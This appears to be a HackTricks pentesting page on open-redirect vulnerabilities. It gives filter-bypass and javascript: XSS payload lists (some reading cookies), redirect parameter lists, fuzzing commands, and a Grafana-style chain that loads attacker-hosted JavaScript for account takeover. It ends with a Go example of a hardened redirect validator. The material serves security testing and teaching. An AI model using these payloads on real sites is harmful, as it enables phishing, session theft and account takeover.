# Open Redirect

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

## Open redirect

### Redirect to localhost or arbitrary domains

- If the app "allows only internal/whitelisted hosts", try alternative host notations that refer to loopback or internal addresses through the redirect target:
  - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
  - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
  - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
  - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These help when only "subdomains of X" are allowed but host resolution still points to 127.0.0.1.
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
  - //attacker.tld → interpreted as scheme-relative; the current scheme is reused and the user is sent off the current site.
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
  - https://trusted.tld@attacker.tld/ → the browser navigates to attacker.tld, but a naive string check "sees" trusted.tld.
- Backslash parsing confusion between frameworks/browsers:
  - https://trusted.tld@attacker.tld → some backends treat "\" as a path character and pass validation; browsers normalize it to "/" and interpret trusted.tld as userinfo, sending users to attacker.tld. This also shows up in Node/PHP URL-parser mismatches.

### URL Format Bypass

### Modern open-redirect to XSS pivots

```text
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
More modern URL-based bypass payloads:

```text
# Scheme-relative (current scheme is reused)
//evil.example

# Credentials (userinfo) trick
https://trusted.example@evil.example/

# Backslash confusion (server validates, browser normalizes)
https://trusted.example@evil.example/

# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example

# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example

# When only path is accepted, try breaking absolute URL detection
/\evil.example
/..//evil.example
```

## Open Redirect uploading svg files

```html
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
```

## Common injection parameters

```text
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```

## Code examples

.Net

```csharp
Response.Redirect("~/mysafe-subdomain/login.aspx");
```

Java

```java
response.sendRedirect("http://mysafedomain.com");
```

PHP

```php
<?php
/* browser redirections */
header("Location: http://mysafedomain.com");
exit;
?>
```

## Hunting and exploitation workflow (practical)

- Quick check of a single URL with curl:

```bash
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
```

- Discover and fuzz candidate parameters at scale:

```bash
# 1) Gather historical URLs, keep those with common redirect params
cat domains.txt | gau --o urls.txt   # or: waybackurls / katana / hakrawler

# 2) Grep common parameters and normalize list
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
  | sed 's/\r$//' | sort -u > candidates.txt

# 3) Use OpenRedireX to fuzz with payload corpus
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

# 4) Manually verify interesting hits (case-insensitive match on 3xx codes or Location headers)
grep -iE '30[1237]|Location:' results.txt
```

- Don't forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read the query/hash and perform a redirect.

- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See the Next.js notes on redirects and avoid dynamic destinations derived from user input.

<a class="content_ref" href="../network-services-pentesting/pentesting-web/nextjs.md"><span class="content_ref_label">NextJS</span></a>

- OAuth/OIDC flows: abuse of open redirectors often leads to account takeover by leaking authorization codes/tokens. See the dedicated guide:

<a class="content_ref" href="./oauth-to-account-takeover.md"><span class="content_ref_label">OAuth to Account takeover</span></a>

- Server responses that perform redirects without a Location header (meta refresh/JavaScript) can still be used for phishing and can sometimes be chained. Grep for:

```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>
```

## Fragment smuggling + client-side traversal chain (Grafana-style bypass)

- Server-side gap (Go url.Parse + raw redirect): validators that only inspect URL.Path and ignore URL.Fragment can be fooled by placing an external host after #. If the handler later builds Location from the unsanitized string, the fragment leaks back into the redirect target. Example against /user/auth-tokens/rotate:
  - Request: `GET /user/auth-tokens/rotate?redirectTo=/%23/..//\//attacker.com HTTP/1.1`
  - Parsing sees Path=/ and Fragment=/..//\//attacker.com, so the regex + path.Clean() approve /, but the response emits Location: /\//attacker.com, acting as an open redirect.
- Client-side gap (validate decoded/cleaned, return original): SPA helpers that fully decode the path (including a double-encoded ?), strip the query for validation, but then return the original string do not stop encoded ../ from surviving. Later browser decoding turns those into a traversal to any same-origin endpoint (e.g., a redirect gadget). Payload pattern:
  - /dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser/auth-tokens/rotate
  - The validator checks /dashboard/script/ (no ..), returns the encoded string, and the browser walks to /user/auth-tokens/rotate.
- End-to-end XSS/ATO: chain the traversal with the fragment-smuggled redirect to coerce the dashboard script loader into fetching attacker JS:
  - https://<grafana>/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser%2fauth-tokens%2frotate%3fredirectTo%3d%2f%2523%2f..%2f%2f%5c%2fattacker.com%2fmodule.js
  - The path traversal reaches the rotate endpoint, which issues a 302 to attacker.com/module.js from the fragment-smuggled redirectTo. Make sure the attacker origin serves JS with permissive CORS so the browser executes it, resulting in session theft/account takeover.
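The following Go program is an added example (not Grafana's code and not part of the original page) that shows why a Path-only validator of the kind described in the server-side gap above, and the naive prefix/startswith checks from the URL Format Bypass section, approve the page's payloads, and what a validator that rebuilds the Location value from parsed components looks like instead. `VulnerableRedirectTarget` and `SafeLocalRedirect` are assumed names; the sample inputs are constructed from the page's payloads, written as a handler would see them after query-string decoding.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// VulnerableRedirectTarget mirrors the Path-only check described above:
// it parses the value, validates only u.Path with path.Clean, and then
// returns the ORIGINAL string for use in a Location header.
func VulnerableRedirectTarget(raw string) (string, bool) {
	u, err := url.Parse(raw)
	if err != nil || u.Host != "" {
		return "", false
	}
	p := path.Clean(u.Path)
	if !strings.HasPrefix(p, "/") || strings.HasPrefix(p, "//") {
		return "", false
	}
	return raw, true // bug: u.Fragment and any "\" in raw were never inspected
}

// SafeLocalRedirect accepts only a same-origin absolute path and rebuilds the
// Location value from the parsed components instead of echoing the input.
func SafeLocalRedirect(raw string) (string, error) {
	// Browsers normalise "\" to "/" and strip some control characters;
	// server-side parsers do not. Fragments never select a destination.
	if strings.ContainsAny(raw, "\\#") || hasControl(raw) {
		return "", errors.New("forbidden character in redirect target")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	// A scheme, host or userinfo means this is not a local path
	// ("//evil.example" parses with an empty scheme but a non-empty host).
	if u.Scheme != "" || u.Opaque != "" || u.Host != "" || u.User != nil {
		return "", errors.New("absolute or scheme-relative URL not allowed")
	}
	// Exactly one leading slash: "//x" and "/\x" are network-path references.
	if !strings.HasPrefix(u.Path, "/") || strings.HasPrefix(u.Path, "//") {
		return "", errors.New("target must start with a single slash")
	}
	// path.Clean must be a no-op (a trailing slash is tolerated); anything
	// else contained dot segments or empty segments, possibly percent-encoded.
	if c := path.Clean(u.Path); c != u.Path && c+"/" != u.Path {
		return "", errors.New("dot or empty path segments not allowed")
	}
	// u.Path is decoded, so "%09", "%00" or "%23" in the input show up here.
	if hasControl(u.Path) || strings.ContainsAny(u.Path, "\\#") {
		return "", errors.New("forbidden character in decoded path")
	}
	out := u.EscapedPath()
	if u.RawQuery != "" {
		out += "?" + u.RawQuery
	}
	return out, nil
}

func hasControl(s string) bool {
	for _, r := range s {
		if r < 0x20 || r == 0x7f {
			return true
		}
	}
	return false
}

func main() {
	// Constructed samples: the page's payloads as a handler sees them after
	// query-string decoding (so %23 has already become "#").
	samples := []string{
		"/account/settings?tab=security",
		"//evil.example",
		"https://trusted.example@evil.example/",
		`/\evil.example`,
		"/..//evil.example",
		"javascript:alert(1)",
		`/#/..//\//attacker.com`,
		"/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser/auth-tokens/rotate",
	}
	for _, s := range samples {
		vuln, ok := VulnerableRedirectTarget(s)
		safe, err := SafeLocalRedirect(s)
		fmt.Printf("%-80q vulnerable=%v %q safe=%q err=%v\n", s, ok, vuln, safe, err)
	}
}
```

Running it shows the Path-only check echoing `/#/..//\//attacker.com`, `/\evil.example` and the double-encoded traversal unchanged (path.Clean of the decoded path looks local, but the raw string is what reaches the browser), while the hardened version only ever emits a value it reconstructed from `u.Path` and `u.RawQuery`.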

## Tools

```bash
# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
```
